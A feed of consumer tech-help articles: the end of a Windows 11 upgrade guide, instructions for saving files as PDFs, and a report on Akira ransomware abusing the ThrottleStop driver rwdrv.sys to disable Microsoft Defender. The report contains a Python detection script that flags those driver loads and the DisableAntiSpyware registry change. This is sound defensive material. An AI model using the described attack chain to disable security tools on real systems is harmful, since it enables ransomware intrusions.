    Once you’ve finished moving everything over to your new Windows 11 computer and confirmed it’s working, don’t forget about your old PC. Leaving files on it could expose your personal data if the computer is ever donated, recycled or resold.

    Before repurposing, always perform a secure wipe to erase all personal information. This step ensures that sensitive files, passwords and documents can’t be recovered later. After wiping, you can safely recycle the device, donate it or set it up for light use elsewhere in your home.

    For step-by-step instructions, check out how to securely get rid of your old computer before recycling, selling or donating it.  

    What if you’re not ready to upgrade?

    Not everyone wants to switch right away. The good news is that Microsoft recently added two ways to extend Windows 10 support until October 13, 2026.

    • Use Microsoft Rewards: Redeem 1,000 points to keep your Windows 10 system covered.
    • Back up with OneDrive: Sync your files through Windows Backup and get extended support for free.

    These options buy you more time, but remember: Windows 11 is the future. Planning now ensures you won’t be caught off guard when the final end date arrives.

    Take my quiz: How safe is your online security?

    Think your devices and data are truly protected? Take this quick quiz to see where your digital habits stand. From passwords to Wi-Fi settings, you’ll get a personalized breakdown of what you’re doing right — and what needs improvement. Take my Quiz here: Cyberguy.com/Quiz

    Kurt’s key takeaways

    Upgrading from Windows 10 to Windows 11 may feel overwhelming, but it doesn’t have to be. With the right preparation, backups and tools, you can make the switch smoothly and protect everything that matters.

    Are you ready to upgrade before Windows 10 support runs out, or will you risk sticking with an outdated system? Let us know by writing to us at Cyberguy.com/Contact


  • How to save any file as a PDF

    Portable Document Format (PDF) is one of the most widely used file formats for storing and sharing documents. It makes sense since PDFs are a universal file format that maintains layout, fonts, colors and images regardless of the device used to read them. Many people use PDFs to send resumes, receipts, tickets, contracts and school papers because they ensure the documents will look the same regardless of who opens them.

    Furthermore, unlike proprietary formats, such as docx, xlsx and pptx, they are less likely to disappear. They’re also one of the easiest files to secure and encrypt in case you’re sending sensitive information.

    The best part? You can turn just about any text document or image into a PDF. Let’s look at some popular ways of doing this.

    Kurt Knutsson explains how to save any file as a PDF. (REUTERS/Hannah Beier)

    Save files as PDF on desktop

    If you’re using a Windows PC or a Mac, there is a built-in option that lets you save a file as a PDF with a few clicks. This method usually works on files like text documents, images and emails.

    Windows

    You can use the print function in many Windows apps to save a file as a PDF.

    • Open the file in its default app.
    • Click File > Print, click the printer icon or press Ctrl + P.
    • In the print dialog window, select Microsoft Print to PDF in the Printer dropdown menu.
    • Click Print.

    Windows offers a built-in way to save a file as a PDF. (Kurt “CyberGuy” Knutsson)

    Mac

    Like Windows, many macOS apps allow you to save files as PDF when printing them.

    • Open the file in its default app.
    • Click File > Print, click the printer icon or press Command + P.
    • In the print dialog window, click PDF in the bottom left corner and choose where to save it.
    • Click Save.

    Chromebook

    Whether you are viewing a document, image or webpage (even in an Android app), as long as the app you’ve opened it in supports printing, you can save it as a PDF.

    • Open the file.
    • Click File > Print, click the printer icon or press Ctrl + P.
    • In the print dialog window, select Save as PDF in the Destination dropdown menu for selecting printers.
    • Click Save.

    Save files as PDF on mobile

    On Android and iPhone, you can use the share function to save files as PDFs. It takes only a few taps.

    Android

    There are several ways to export a file as a PDF on Android, with the easiest option being the print function when sharing it.

    Settings may vary depending on your Android phone’s manufacturer. 

    • Open the file in the default app.
    • Tap the Share icon.
    • Tap Print.
    • Tap the PDF button to download it.

    iPhone

    On iPhone, you can save a file as a PDF in apps like Photos, Files and Notes. Here are the general steps:

    • Open the file.
    • Tap the Share icon.
    • Tap Print to see a PDF preview of the file.
    • Tap the Share icon.
    • Tap Save to Files.
    • Then, tap “Save” in the upper-right corner of the screen.

    You can save a file as a PDF on your iPhone or Android. (Kurt “CyberGuy” Knutsson)

    Save a file as a PDF on apps and cloud services

    Many apps and online services offer built-in tools to convert files to PDF format, whether you’re using popular office suites or cloud-based services. Let’s look at the options available on various platforms.

    If you’re using Microsoft Office apps, such as Word, Excel and PowerPoint, you can just save the file as a PDF.

    • Open the file.
    • Click File > Save As.
    • Under the location where the PDF will be saved, set the file type dropdown to PDF.
    • Click Save.

    Follow these steps to save a document as PDF in Microsoft Word. (Kurt “CyberGuy” Knutsson)

    For Google Workspace apps, such as Docs, Sheets and Slides, you can download them as a PDF:

    • Open the file.
    • Click File.
    • Then click Download.
    • Next, click PDF Document.

    If you want to save a webpage in browsers like Chrome, Edge and Firefox, follow the steps below:

    • Open the web page.
    • Click the three-dot icon or three-line icon in the top-right corner.
    • Click Print.

    Even a webpage can be saved and exported as a PDF file. (Kurt “CyberGuy” Knutsson)

    • Set Printer or Destination to Save as PDF.
    • Click Save.

    Follow these steps to save a document as PDF in the Edge internet browser. (Kurt “CyberGuy” Knutsson)

    In Adobe Acrobat Reader, follow the steps below (keep in mind that you need a premium subscription to use this feature):

    • Open the file in Adobe Acrobat Reader. It will automatically be converted to a PDF.
    • Press Ctrl + S on Windows or Command + S on Mac to save the PDF.

    Notetakers like Evernote, OneNote and Notion also allow you to export files as a PDF. For instance, in Notion, you have to do it this way:

    • Click the three-dot icon in the top-right corner.
    • Click Export.
    • Select PDF in the Export format dropdown.
    • Click Export.

    Convert a file to a PDF online

    You can convert files to PDF using online conversion tools. To convert a file into a PDF using CloudConvert, follow the steps below:

    • Go to https://cloudconvert.com/
    • Click Select File.
    • Select the file you want to convert on your computer or phone.
    • Select PDF in the Convert to dropdown. You can upload more than one file.
    • Click Convert.
    • Click Download.

    While these sites provide a convenient means of converting files to PDFs, it’s best to avoid uploading sensitive documents like tax returns, medical records, financial statements, legal contracts or personal identification documents. That’s because they may store copies of those files on their servers, which means they can become vulnerable to security breaches or unauthorized access. For these, use built-in tools or trusted apps (any of the ones mentioned above will do).

    Save physical documents as PDF files

    You will find many apps for scanning documents and saving them as a PDF on Android and iPhone. The best one often mentioned is Adobe Scan, which you can download on the App Store or Google Play.

    Here’s how to use it.

    • Open Adobe Scan.
    • If it’s your first time opening it, you will need to sign in with your Apple (iPhone only), Google or Facebook account.
    • Tap the white circle in the bottom center of the screen to scan the document.
    • Tap Save PDF in the bottom right corner.

    Working with PDFs

    Once you’ve saved your file as a PDF, you may want to perform various actions to make it more useful or secure. Here’s how to work with your PDF files effectively.

    Merging PDFs

    You can use online tools to merge PDFs for free.

    • On your computer, go to https://acrobat.adobe.com/link/acrobat/combine-pdf.
    • Drag and drop the PDFs you want to merge into the browser window.

    Adobe’s website offers a free method to combine PDF files. (Kurt “CyberGuy” Knutsson)

    • You can rearrange the PDFs by dragging them to the position you want them to be in.
    • Click Combine in the top-right corner.

    The Adobe website makes it possible to combine PDFs and arrange them in any order. (Kurt “CyberGuy” Knutsson)

    Shrinking PDFs

    Adobe also has an online tool you can freely use to compress PDFs.

    • On your computer, go to https://www.adobe.com/acrobat/online/compress-pdf.html.
    • Drag and drop the PDF you want to compress into the browser window.
    • Click Compress in the bottom-right corner.

    Protecting your PDFs with a password

    You can also password-protect your PDFs for free on the Adobe website using the steps below.

    • On your computer, go to https://acrobat.adobe.com/link/acrobat/protect-pdf.
    • Drag and drop the PDF you want to password-protect into the browser window.
    • Enter the password under Set password. Enter the same password under Confirm password.
    • Click Set password in the bottom-right corner.

    You can protect a PDF with a password on the Adobe website. (Kurt “CyberGuy” Knutsson)

    Sign PDFs

    There are plenty of ways to sign a document, and the easiest one is to use Adobe Acrobat Reader.

    • Open the PDF in Adobe Acrobat Reader on your computer.
    • Select the E-sign tab.
    • Click Add signature or Add initials in the FILL AND SIGN YOURSELF section in the menu on the left.
    • Type your signature or initials in the dialog window. You can also draw it if you have a graphics tablet or add an image of it. Just switch to the Draw or Image tab.
    • Click Apply.
    • In the toolbar on the left side of the document area, click the pen icon.
    • Select your signature or initials in the menu that appears on the right.
    • Place your cursor, which will now look like your signature or initials, where you want to sign and click to insert the signature.

    Kurt’s key takeaways

    As you can see, saving any file as a PDF is easy regardless of your device or platform. It takes just a few clicks or taps. Use PDFs when you want to share documents without losing their formatting elements. Remember to follow best practices when sharing them, especially if they contain sensitive information. You can always add an extra layer of security by password-protecting or encrypting your PDFs.

    What other format do you like converting files to for storing and sharing? Let us know by writing to us at CyberGuy.com.


  • Hackers found a way to turn off Windows Defender remotely

    Most modern Windows PCs rely on Microsoft Defender as their first line of defense against malware. Over the years, it has evolved into a capable and often underrated antivirus that blocks a wide range of threats. But a hacker group has found a way to abuse a legitimate Intel CPU tuning driver in a “Bring Your Own Vulnerable Driver” (BYOVD) attack to completely disable Microsoft Defender.

    The technique has been observed since mid-July 2025 and is already being used in active ransomware campaigns. The method doesn’t rely on exploiting a software bug or delivering an obviously malicious file. Instead, it takes advantage of how the Windows driver system is designed to allow deep hardware access.

    Let’s discuss all you need to know about the attack and how you can stay safe.

    The Akira ransomware group exploits a legitimate Intel CPU tuning driver in cyberattacks to completely disable Microsoft Defender on Windows systems. (Kurt “CyberGuy” Knutsson)

    How Akira ransomware disables Microsoft Defender

    The Akira ransomware group has developed a new way to bypass security tools by using a legitimate Intel CPU tuning driver called rwdrv.sys from the performance-tweaking tool ThrottleStop. Security firm GuidePoint Security says attackers load this driver to gain kernel-level access to Windows systems, then install a second malicious driver, hlpdrv.sys, which changes the DisableAntiSpyware registry setting via regedit.exe to shut down Microsoft Defender.

    Once Defender is disabled, attackers can run other malicious programs undetected. GuidePoint says this method has been consistently spotted in Akira campaigns since mid-July.
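
For administrators, one way to correlate the activity described above in endpoint logs. This is an added example, not GuidePoint's published rule or code from the article. The event records are constructed and simplified from Sysmon's driver-load (ID 6) and registry value-set (ID 13) events; the 30-minute window, host names, file paths and registry key path are assumptions.

```python
import re
from datetime import datetime, timedelta

# Driver file names reported in the article. Matching is by name only, so a
# renamed file would need the hashes GuidePoint published (not reproduced here).
SUSPECT_DRIVERS = {"rwdrv.sys", "hlpdrv.sys"}
# Assumption: the article names only the value; this suffix matches it under
# both the policy key and the main "Windows Defender" key.
DEFENDER_VALUE = "\\windows defender\\disableantispyware"
WINDOW = timedelta(minutes=30)  # assumed correlation window


def ev(ts, host, event_id, **fields):
    """Build one simplified event record (constructed schema)."""
    return {"time": datetime.fromisoformat(ts), "host": host,
            "event_id": event_id, **fields}


DEFENDER_KEY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware"

# Constructed sample events, not taken from any real incident.
SAMPLE_EVENTS = [
    # HOST-A: both drivers load, then regedit.exe sets the value to 1.
    ev("2025-08-01T10:00:05", "HOST-A", 6, image_loaded=r"C:\Users\Public\rwdrv.sys"),
    ev("2025-08-01T10:00:40", "HOST-A", 6, image_loaded=r"C:\Users\Public\hlpdrv.sys"),
    ev("2025-08-01T10:01:10", "HOST-A", 13, image=r"C:\Windows\regedit.exe",
       target_object=DEFENDER_KEY, details="DWORD (0x00000001)"),
    # HOST-B: value written as 0 (Defender left enabled), unrelated driver.
    ev("2025-08-01T11:00:00", "HOST-B", 6, image_loaded=r"C:\Windows\System32\drivers\example.sys"),
    ev("2025-08-01T11:05:00", "HOST-B", 13, image=r"C:\Windows\regedit.exe",
       target_object=DEFENDER_KEY, details="DWORD (0x00000000)"),
    # HOST-C: Defender disabled, but neither driver was seen.
    ev("2025-08-01T12:00:00", "HOST-C", 13, image=r"C:\Windows\System32\reg.exe",
       target_object=DEFENDER_KEY, details="DWORD (0x00000001)"),
    # HOST-D: rwdrv.sys alone, which a legitimate ThrottleStop install also loads.
    ev("2025-08-01T13:00:00", "HOST-D", 6, image_loaded=r"C:\Tools\ThrottleStop\rwdrv.sys"),
]


def file_name(path):
    """Lower-cased last component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def disables_defender(event):
    """True for a registry write that sets DisableAntiSpyware to non-zero."""
    if event["event_id"] != 13:
        return False
    if not event["target_object"].lower().endswith(DEFENDER_VALUE):
        return False
    match = re.search(r"0x([0-9a-f]+)", event.get("details", ""), re.I)
    return bool(match) and int(match.group(1), 16) != 0


def correlate(events, window=WINDOW):
    """Return findings: 'high' when a suspect driver load precedes the
    Defender-disabling write on the same host within the window, 'medium'
    for the write alone, 'review' for a suspect driver load alone."""
    findings = []
    loads = {}  # host -> [(time, driver file name)]
    for event in sorted(events, key=lambda e: e["time"]):
        host = event["host"]
        if event["event_id"] == 6:
            name = file_name(event["image_loaded"])
            if name in SUSPECT_DRIVERS:
                loads.setdefault(host, []).append((event["time"], name))
        elif disables_defender(event):
            recent = sorted({name for seen, name in loads.get(host, [])
                             if event["time"] - seen <= window})
            findings.append({
                "host": host,
                "time": event["time"],
                "severity": "high" if recent else "medium",
                "drivers": recent,
                "writer": file_name(event.get("image", "")),
            })
    # Suspect driver loads never tied to a registry write still merit a look.
    correlated = {f["host"] for f in findings if f["drivers"]}
    for host, seen in loads.items():
        if host not in correlated:
            findings.append({"host": host, "time": seen[0][0],
                             "severity": "review",
                             "drivers": sorted({name for _, name in seen}),
                             "writer": ""})
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding["severity"], finding["host"],
              finding["drivers"], finding["writer"])
```

The "review" tier exists because rwdrv.sys also ships with a legitimate tool, so its presence alone does not confirm an intrusion.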

    The Akira ransomware group has been infiltrating Windows operating systems by exploiting a legitimate driver to gain access. (Kurt “CyberGuy” Knutsson)

    Akira ransomware targets Microsoft Defender and SonicWall VPNs

    The same group has also been linked to attacks targeting SonicWall VPN devices. SonicWall has stated that these incidents likely involve a known vulnerability, CVE-2024-40766, rather than a brand-new zero-day. The company recommends restricting VPN access, enabling multi-factor authentication, and disabling unused accounts as immediate defenses.

    Akira attacks often involve stealing data, setting up hidden remote access, and deploying ransomware to encrypt files across an organization. Security experts warn that fake or lookalike websites are increasingly being used to distribute these malicious tools.

    Researchers at GuidePoint have published a YARA detection rule, along with file names, service names, SHA-256 hashes, and file paths to help identify this activity. They recommend administrators actively monitor for these indicators, apply filtering and blocking rules as new IoCs emerge, and only download software from official or verified sources.

    We reached out to Microsoft for a comment, but did not hear back before our deadline.

    Antivirus software, two-factor authentication and data removal services are just a few ways Windows users can protect themselves from hackers. (Cyberguy.com)

    6 ways to protect yourself against Akira ransomware and similar threats

    The Microsoft Defender attack is smart and dangerous, but you’re not without defenses. Here are a few tips to help you stay safe:

    1) Use strong antivirus software

    Even with regular updates, Windows systems can be left exposed if built-in defenses are disabled. Strong antivirus software with real-time protection, kernel-level monitoring, and frequent updates can provide backup security. The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

    Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android & iOS devices at CyberGuy.com.

    2) Limit exposure

    Many exploits rely on user interaction, such as clicking a shady link, downloading a compromised file, or mounting an untrusted virtual disk. Stick to reputable websites, avoid opening unsolicited email attachments, and use a browser with built-in security features (like Microsoft Edge or Chrome with Safe Browsing enabled).

    3) Avoid running unexpected commands

    Never paste or run commands (like PowerShell scripts) you don’t understand or that were copied from random websites. Attackers often trick users into unknowingly running malware this way.

    4) Keep your software updated

    Regularly update your operating system, browsers, and all software applications. Updates often include patches for security vulnerabilities that malware can exploit.

    5) Use two-factor authentication (2FA)

    Enable 2FA on all your accounts. This adds an extra layer of security by requiring a second form of verification, making it harder for attackers to gain access even if they have your password.

    6) Invest in personal data removal services

    Even with strong device security, your personal information may still be exposed online through data brokers and people-finder sites.

    While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice. They aren’t cheap – and neither is your privacy. These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.

    Check out my top picks for data removal services and get a free scan to find out if your personal information is already out on the web by visiting Cyberguy.com.

    Kurt’s key takeaway

    Akira’s trick shows a bigger flaw in how Windows trusts certain tools. A driver meant for harmless CPU tuning ends up being the key to turning security off. Since it’s from a legitimate source, Windows just lets it through without asking questions. We tend to think hackers always break in from the outside. Here, they’re already inside the circle of trust, using the system’s own rules.

    Should Microsoft be doing more to stop ransomware groups from disabling Defender? Let us know by writing to us at Cyberguy.com.

    Copyright 2025 CyberGuy.com.  All rights reserved.
